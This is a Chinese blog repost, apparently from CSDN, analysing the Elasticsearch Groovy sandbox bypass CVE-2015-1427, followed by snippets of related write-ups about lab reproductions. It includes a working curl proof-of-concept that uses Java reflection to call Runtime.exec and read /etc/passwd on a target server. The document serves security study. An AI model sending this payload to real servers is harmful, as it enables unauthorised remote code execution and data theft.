CVE-2015-1427

最新推荐文章于 2025-06-23 18:47:25 发布
转载 最新推荐文章于 2025-06-23 18:47:25 发布 · 610 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/u/937015/blog/824359
文章标签:

#java #大数据 #shell

本文分析了ElasticSearch中Groovy脚本存在的远程代码执行漏洞(CVE-2015-1427),揭示了其沙盒机制在表达式检查上的局限性,并提供了利用此漏洞的具体示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427)

com.elasticsearch.script.groovy.GroovySandboxExpressionChecker 逻辑存在漏洞

从代码中可以看到这个沙盒,只是根据黑白名单,在表达式语义上判断表达式是否合法的,可以说是一个“浅”沙盒,简单来来说,比如沙盒设置不允许调用shell()这个方法,直接调用shell()方法,沙盒在表达式中发现了shell()这个字符串,就会报非法调用,但是如果有一个方法叫poc()这个方法中调用了shell()方法(poc(){shell()}),当调用poc()方法的时候,shell()方法也就被间接调用了沙盒并不会报错。

curl -XPOST 'http://ip:port/_search?pretty' -d '{
        "size":1,
        "script_fields":{
                "lupin":{
                "script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()",
                "lang":"groovy"
                }
        }
}'

https://www.secpulse.com/archives/5047.html

转载于:https://my.oschina.net/u/937015/blog/824359

Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 659
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
利用Vulnhub复现漏洞 - ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境
JiangBuLiu的博客
07-02 1252
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境Vulnhub官方复现教程漏洞原理Groovy语言“沙盒”复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/ 漏洞原理 参考文章: http://...
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 1046
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
CVE-2015-1427源码分析与漏洞复现(ElasticSearch 远程代码执行)
最新发布
spinage的博客
06-23 1064
ElasticSearch Groovy沙盒绕过漏洞(CVE-2015-1427)分析 该漏洞影响ElasticSearch 1.3.0-1.3.7和1.4.0-1.4.2版本,CVSS评分9.8。漏洞源于Groovy脚本引擎沙盒机制未严格限制反射操作,攻击者可通过白名单类(如java.lang.Math)获取Class对象,利用forName()加载危险类(如Runtime),最终执行任意系统命令。漏洞复现需先创建索引数据,再发送包含恶意脚本的请求。修复方案包括升级至1.3.8/1.4.3以上版本或禁用
春秋云境:CVE-2015-1427[漏洞复现]
如有错误感谢斧正
08-11 705
执行cat /flag命令,可以看到回显是Base64格式。执行whoami命令,可以看到响应体末尾已经出现回显。Payload:(上方双斜杠需要换成单斜杠)使用Yakit自带的Codec功能进行解码。
buuctf [ElasticSearch]CVE-2015-1427
qq_1873822的博客
03-24 667
漏洞描述 ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个 远程代码执行漏洞(CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 Groovy语言“沙盒” ElasticSearch支持使用“在沙盒中的”Groovy语言
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 554
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
ElasticSearch-CVE-2015-1427
04-03
### 关于 ElasticSearch CVE-2015-1427 漏洞 #### 漏洞概述 ElasticSearch 存在一个严重的代码执行漏洞,编号为 CVE-2015-1427。该漏洞允许攻击者通过特定条件下的脚本执行功能,在目标服务器上实现远程代码执行。...
CVE-2015-1427(ElasticSearch 命令执行漏洞)
L_erAry的博客
03-19 421
Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。2014年爆出过一个远程代码执行漏洞(CVE-2014-3120),该漏洞产生原因是由于ElasticSearch使用的脚本引擎支持脚本代码MVEL作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码。
CVE-2015-1427 ElasticSearch(Groovy 沙盒绕过 && 代码执行漏洞)
weixin_51387754的博客
11-17 2998
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy对
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5702
春秋云镜CVE-2015-1427 ElasticSearch RCE
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1295
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞)
浅笑996的博客
11-22 2108
1、vulhub环境搭建 https://blog.youkuaiyun.com/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
春秋云镜 CVE-2015-1427
qq_22002773的博客
09-14 405
春秋云镜 CVE-2015-1427
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427
weixin_34292924的博客
03-08 381
lupin · 2015/03/04 15:17作者:京东安全团队 Lupin0x00 前言ElasticSearch是一个JAVA开发的搜索分析引擎。2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy...
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427
黑白的博客
12-13 826
声明 好好学习,天天向上 漏洞描述 和3210的漏洞很像,也是恶意代码执行漏洞,3210是执行任意MVEL表达式和java代码,3210之后MVEL表达式被弃用,ES的动态脚本语言换成了Groovy(而且增加了sandbox),然额换成Groovy之后仍然存在恶意代码执行漏洞 影响范围 Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 复现过程 这里使用v1.4.2版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值